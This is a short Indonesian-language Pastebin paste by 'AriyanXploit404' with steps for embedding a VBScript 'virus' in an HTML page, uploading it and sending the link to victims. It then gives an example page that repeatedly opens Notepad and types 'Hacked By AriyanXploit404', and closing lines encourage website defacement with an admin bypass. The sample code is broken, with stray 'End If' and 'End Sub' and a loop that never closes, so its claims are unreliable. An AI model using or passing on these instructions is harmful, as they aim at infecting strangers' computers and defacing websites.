Advertisement
AriyanXploit404

Catatan II

Dec 21st, 2021
66
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.85 KB | None | 0 0
  1. Catatan II
  2.  
  3. - Jika Ingin Memasukan Virus .vbs Ke HTML pastikan Virus Tidak Di Encrypt
  4. - Masukan Kode HTML khusus Sebelum Memasukan Virus
  5. - Virus Hanya Akan Berkerja Pada Komputer Dan Menginfeksi Komputer Dari Browser Web
  6. - Pastikan Upload Di Web Agar Berkerja
  7. - Salin Link HTML Terinfeksi Yang Sudah Di Upload Di Web Dan Berikan Pada Korban Pengguna Komputer
  8.  
  9. Kode
  10. = <script language="vbscript">...</script>
  11.  
  12. * ... Isilah Dengan Virus .vbs
  13.  
  14. Contoh :
  15.  
  16. <html>
  17. <body>
  18. <h1>
  19. Hello World
  20. </h1>
  21. <script language="vbscript">
  22. On Error Resume Next
  23. set wshshell = wscript.CreateObject("wScript.Shell")
  24. dim n
  25. for n = 1 to 100000000
  26. wshshell.run "Notepad"
  27. wscript.sleep 400
  28. wshshell.sendkeys "H"
  29. wscript.sleep 100
  30. wshshell.sendkeys "a"
  31. wscript.sleep 120
  32. wshshell.sendkeys "c"
  33. wscript.sleep 200
  34. wshshell.sendkeys "k"
  35. wscript.sleep 100
  36. wshshell.sendkeys "e"
  37. wscript.sleep 140
  38. wshshell.sendkeys "d"
  39. wscript.sleep 100
  40. wshshell.sendkeys " "
  41. wscript.sleep 50
  42. wshshell.sendkeys "B"
  43. wscript.sleep 120
  44. wshshell.sendkeys "y"
  45. wscript.sleep 170
  46. wshshell.sendkeys " "
  47. wscript.sleep 100
  48. wshshell.sendkeys "A"
  49. wscript.sleep 50
  50. wshshell.sendkeys "r"
  51. wscript.sleep 120
  52. wshshell.sendkeys "i"
  53. wscript.sleep 160
  54. wshshell.sendkeys "y"
  55. wscript.sleep 200
  56. wshshell.sendkeys "a"
  57. wscript.sleep 100
  58. wshshell.sendkeys "n"
  59. wscript.sleep 100
  60. wshshell.sendkeys "X"
  61. wscript.sleep 100
  62. wshshell.sendkeys "p"
  63. wscript.sleep 100
  64. wshshell.sendkeys "l"
  65. wscript.sleep 100
  66. wshshell.sendkeys "o"
  67. wscript.sleep 100
  68. wshshell.sendkeys "i"
  69. wscript.sleep 100
  70. wshshell.sendkeys "t"
  71. wscript.sleep 100
  72. wshshell.sendkeys "4"
  73. wscript.sleep 100
  74. wshshell.sendkeys "0"
  75. wscript.sleep 100
  76. wshshell.sendkeys "4"
  77. End If
  78. End Sub
  79. </script>
  80. </body>
  81. </html>
  82.  
  83. (Jika Kau Defacer Pasti Paham lah Caranya Defacingnya_-)
  84. (Agar Lebih Efektif Lagi Pastikan Defacingnya Dengan By Pass Admin)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement